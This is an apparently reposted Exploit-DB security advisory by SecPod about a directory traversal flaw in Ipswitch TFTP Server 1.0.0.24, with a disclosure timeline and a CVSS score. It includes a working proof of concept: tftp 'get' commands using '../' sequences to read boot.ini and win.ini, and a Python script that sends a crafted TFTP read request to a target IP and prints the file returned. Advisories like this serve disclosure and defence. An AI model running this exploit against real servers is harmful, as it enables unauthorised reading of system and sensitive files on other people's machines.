Ipswitch TFTP Server 1.0.0.24 – Directory Traversal - 体验盒子

作者： SecPod Research
日期： 2011-12-02
类别：
remote
平台：
windows
来源：https://www.exploit-db.com/exploits/18189/
##############################################################################
# Title : Ipswitch TFTP Server Directory Traversal Vulnerability
# Author: Prabhu S Angadi from SecPod Technologies (www.secpod.com)
# Vendor: http://www.whatsupgold.com/index.aspx
# Advisory: http://secpod.org/blog/?p=424
# http://secpod.org/advisories/SecPod_Ipswitch_TFTP_Server_Dir_Trav.txt
# http://secpod.org/exploits/SecPod_Ipswitch_TFTP_Server_Dir_Trav_POC.py
# Version : Ipswitch TFTP Server 1.0.0.24
# Date: 02/12/2011
##############################################################################

SecPod ID: 1028					13/09/2011 Issue Discovered
						04/10/2011 Vendor Notified
						No Response from Vendor
						02/12/2011 Advisory Released


Class: Information Disclosure Severity: Medium


Overview:
---------
Ipswitch TFTP Server 1.0.0.24 is prone to a directory traversal
vulnerability.


Technical Description:
----------------------
The vulnerability is caused due to improper validation to Read Request
containing '../' sequences, which allows attackers to read arbitrary
files.


Impact:
--------
Successful exploitation could allow an attacker to obtain sensitive
information.


Affected Software:
------------------
Ipswitch TFTP Server 1.0.0.24


Tested on:
-----------
Ipswitch TFTP Server 1.0.0.24 on Windows XP SP3 & Windows 7.


References:
-----------
http://www.ipswitch.com/
http://secpod.org/blog/?p=424
http://www.whatsupgold.com/index.aspx
http://secpod.org/advisories/SecPod_Ipswitch_TFTP_Server_Dir_Trav.txt
http://secpod.org/exploits/SecPod_Ipswitch_TFTP_Server_Dir_Trav_POC.py


Download Link:
--------------
http://www.whatsupgold.com/free-software/network-tools/tftp-server.aspx


Proof of Concept:
----------------
tftp> get ../../../../../../../../../../../boot.ini
tftp> get ../../../../../../../../../../../windows/win.ini


Solution:
----------
Not available


Risk Factor:
-------------
CVSS Score Report:
ACCESS_VECTOR= NETWORK
ACCESS_COMPLEXITY= LOW
AUTHENTICATION = NOT_REQUIRED
CONFIDENTIALITY_IMPACT = PARTIAL
INTEGRITY_IMPACT = NONE
AVAILABILITY_IMPACT= NONE
EXPLOITABILITY = PROOF_OF_CONCEPT
REMEDIATION_LEVEL= UNAVAILABLE
REPORT_CONFIDENCE= CONFIRMED
CVSS Base Score= 5.0 (AV:N/AC:L/Au:NR/C:P/I:N/A:N)
CVSS Temporal Score= 4.5
Risk factor= Medium


Credits:
--------
Prabhu S Angadi of SecPod Technologies has been credited with the discovery of
this vulnerability.


POC :
======
import sys, socket

def sendPacket(HOST, PORT, data):
'''
Sends UDP Data to a Particular Host on a Specified Port
with a Given Data and Return the Response
'''
udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udp_sock.sendto(data, (HOST, PORT))
data = udp_sock.recv(1024)
udp_sock.close()
return data

if __name__ == "__main__":

if len(sys.argv) < 2:
print '\tUsage: python exploit.py target_ip'
print '\tExample : python exploit.py 127.0.0.1'
print '\tExiting...'
sys.exit(0)

HOST = sys.argv[1] ## The Server IP
PORT = 69## Default TFTP port

data = "\x00\x01"## TFTP Read Request
data += "../" * 10 + "boot.ini" + "\x00" ## Read boot.ini file using directory traversal
data += "netascii\x00" ## TFTP Type

## netascii
rec_data = sendPacket(HOST, PORT, data)
print "Data Found on the target : %s " %(HOST)
print rec_data.strip()